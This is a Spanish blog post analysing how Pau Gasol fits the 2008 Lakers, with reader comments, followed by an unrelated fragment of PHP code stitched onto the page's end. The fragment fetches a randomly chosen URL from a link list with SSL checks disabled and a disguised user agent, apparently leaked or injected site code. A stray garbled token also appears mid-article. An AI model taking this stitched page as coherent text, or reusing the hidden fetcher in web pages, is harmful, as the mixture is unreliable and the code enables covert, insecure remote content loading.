Los Lakers con Gasol: un análisis

04 de February de 2008 por MagicJohnson32

El “do it something and do it now” pronunciado por Kobe Bryant este verano ya ha tenido respuesta. La adquisición de Pau Gasol por parte de los Lakers devuelve a la franquicia angelina a la elite de la NBA. Aquello por lo que Kobe renovó en el verano de 2004, aquello por lo que Phil Jackson regresó a los banquillos en 2005, ese momento ha llegado: los Lakers son de nuevo candidatos al anillo.

Para ello necesitarán recuperar a Bynum, cuya lesión en la rodilla izquierda le mantendrá fuera de las pistas hasta, al menos, mediados de marzo. El pívot cayó justo cuando había empezado a mostrarse como el jugador dominante que la franquicia veía en él cuando lo seleccionó con el décimo pick del draft de 2005. En el momento de su lesión, el 13 de enero, los Lakers encabezaban contra pronóstico la conferencia Oeste con un balance de 25-11.

La baja de Bynum fue un duro golpe que los Lakers pagaron con 5 derrotas en los siguientes ocho partidos. Sin embargo, y coincidiendo con el anuncio del acuerdo con los Grizzlies, el equipo ha vuelto a ofrecer una magnífica imagen en sus dos últimos partidos, triunfos cómodos en Toronto y Washington, y parece que se reengancha a la disputa por los primeros puestos del Oeste.

La adquisición de Gasol es, en términos deportivos, un salto cualitativo incalculable para Lakers. A excepción del aspecto defensivo, las cualidades de Pau encajan a la perfección en el triángulo ofensivo de Phil Jackson: inteligente, buen pasador desde el poste medio y bajo, sabe jugar de espaldas y de cara alpaulakersbech aro, capaz de generar juego y crearse sus propios tiros, de jugar en estático y en transición… Nada hace pensar que Gasol vaya a tener problemas para encajar en el sistema de Jackson, quien además ve aliviado el dolor de cabeza que suponía contar con Kwame Brown, Ronny Turiaf y Mbenga como únicos interiores sanos. El impacto de su incorporación sigue una lógica sencilla: por primera vez desde la marcha de Shaq los Lakers cuentan con dos All-Stars en sus filas.

Pau, una vez integrado y recuperado completamente de sus problemas en la espalda, será el pívot titular hasta que se produzca el regreso de Bynum. Entonces, Gasol se desplazará a la posición de 4 y formará un frontcourt formidable junto a Bynum y Odom. El quinteto titular, salvo lesiones, lo completarán en el backcourt Fisher y Bryant. Desde el banquillo partirán Walton, Farmar, Ariza, Turiaf, Radmanovic y Vujacic, jugadores que están lejos de ser estrellas pero que ofrecen ciertas garantías y alternativas interesantes.

¿Qué se puede esperar de estos Lakers? Hará falta un periodo de transición, aunque la inteligencia de Gasol le permitirá integrarse rápidamente y rendir desde el primer momento. Tras comprobar en el inicio de campaña cómo Bryant moldeaba su juego ante el gran rendimiento de Bynum, es fácil imaginar que la sociedad que compongan Kobe y Pau resulte productiva. Todavía no hemos visto al mayor de los Gasol con un rol secundario, pero la atención que produce Bryant sobre las defensas rivales le tiene que facilitar las cosas, más aún cuando forme pareja interior con Bynum.

Será interesante comprobar la actitud y juego de Kobe Bryant. Sus prestaciones en los encuentros más recientes son excepcionales (35.3 puntos con un 56% en tiros, 8.8 rebotes y 5.2 asistencias de media en los 6 últimos partidos). Pero la llegada de Gasol plantea una coyuntura nueva para él: por primera vez un jugador importante se incorpora al equipo durante la temporada. Kobe, como líder del equipo y mayor conocedor del sistema del triángulo ofensivo (Jackson afirma que Bryant conoce el sistema hasta el punto de que es capaz de saltarse un par de pasos y ejecutarlo igualmente), ha de realizar un esfuerzo por integrar a Gasol en el juego, algo esencial para el éxito inmediato del proyecto.

Uno de los grandes interrogantes de este equipo es su rendimiento en defensa. Si el equipo funciona ofensivamente, Bryant podrá recuperar el nivel defensivo que ya mostró en el arranque de la temporada. Es el mejor defensor con el que cuenta Jackson y únicamente el lesionado Ariza supone una alternativa de calidad en este apartado. En la posición de base, Fisher cuenta con su inteligencia como principal arma y su capacidad para provocar faltas de ataque como gran recurso, aunque sufre ante jugadores rápidos que utilizan el pick and roll. Odom también tendrá problemas ante la mayor velocidad de sus rivales, aunque su contribución al rebote será más valiosa. Cerca del aro es donde los Lakers pueden tener más problemas y donde se concentran las amenazas rivales (Duncan, Boozer, Stoudemire, Nowitzki…). Gasol tendrá que aumentar sus prestaciones, algo que debería de estar en condiciones de hacer una vez liberado de la responsabilidad de ser el jugador franquicia. No tendrá mucha ayuda: Turiaf aporta intensidad pero su reducida envergadura le impide ser determinante; Mihm sigue con problemas físicos y aun sano es un jugador débil y sin presencia defensiva; y Bynum ha de aprender a ser efectivo sin cargarse de faltas, una capacidad de la que ya ha dado algunas muestras esta temporada.

Las primeras respuestas a todas estas cuestiones las tendremos la madrugada del martes al miércoles, hacia la 1:30. A esa hora está previsto el inicio del partido entre New Jersey Nets y Los Angeles Lakers, encuentro que supondrá, salvo contratiempo, el debut de Pau Gasol con su nuevo equipo y el primer paso de un camino con las miras puestas en las Finales.

Comenta

8 comentarios a esta entrada

  1. telekoman dice:
    #1

    Bravo, ahora hace falta un buen análisis de Memphis.Claro que … ¿a quién le importa ahora Memphis?

      Citar

  2. RusticoColorao dice:
    #2

    Buen análisis Magic…la verdad que tengo ganas de ver cómo encaja Pau

      Citar

  3. MagicJohnson32 dice:
    #3

    Es que a mí Memphis no me importó nunca, imagina ahora…

    Creo que Pau lo tiene todo para encajar bien. Espero poder ver el partido de mañana, aunque hay que darle un plazo razonable. También será interesante, y se me ha pasado comentarlo en el texto, ver cómo administra Phil Jackson la entrada de Pau. P-Jax siempre ha sido reacio a incorporaciones sobre la marcha, ya echó para atrás la de Webber, por ejemplo. Evidentemente esto es una excepción y Phil tiene que estar feliz, pero habrá que ver si lo utiliza como titular o le va dando minutos progresivamente partiendo desde el banco.

      Citar

  4. Pow_Brolin dice:
    #4

    Mnnnnnnnnn el autor omite hablar de la hitorica bula arbitral amarilla … ahora Gasol sera mas “respetado” por los arbitros y en teoria su juego se beneficiara de ello.

      Citar

  5. MagicJohnson32 dice:
    #5

    Sí, y he omitido también la vida de David el Gnomo, pero es que no escribo sobre cosas que no existen :p)

      Citar

  6. Noelinho dice:
    #6

    A ver como se adapta Pau a ser un segundo espada. Me siento un poquito más amarillo hoy…pero sólo un poquito :p

      Citar

  7. Garci dice:
    #7

    Como se va a adaptar Pau? Pos bien, si ha ido a un equipo campeon. Adaptarse a eso tiene que ser facil. Dificil tiene que ser adaptarse ahora a menphis, jeje!!

      Citar

  8. frank dice:
    #8

    Sin Bynum Super-Pow jugara de 4 o jugara de 5?. That´s the question..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>